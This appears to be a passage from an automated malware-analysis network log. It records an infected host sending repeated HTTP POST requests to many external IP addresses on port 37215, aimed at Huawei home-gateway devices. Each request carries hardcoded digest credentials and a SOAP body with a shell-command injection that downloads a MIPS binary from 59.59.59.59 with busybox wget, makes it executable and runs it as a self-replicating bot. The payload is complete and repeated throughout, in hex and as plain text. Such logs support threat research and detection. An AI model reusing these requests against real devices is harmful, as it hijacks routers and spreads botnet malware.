2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          480192.168.2.1539200196.207.202.9337215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:49.572109938 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          481192.168.2.153720041.39.143.11437215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:49.572133064 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          482192.168.2.1539142157.188.120.2437215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:49.572160006 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          483192.168.2.1552642197.113.135.21537215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:49.572181940 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          484192.168.2.155609641.120.225.20237215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:49.599600077 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          485192.168.2.1548762197.7.234.2037215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:49.599633932 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          486192.168.2.153323441.230.63.18237215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:49.599648952 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          487192.168.2.1539096197.15.177.21337215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:49.599703074 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          488192.168.2.1555772157.254.16.24037215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:49.604912996 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          489192.168.2.1538070197.2.71.17137215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:49.604943991 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          490192.168.2.1548338157.191.226.18237215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:49.605006933 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
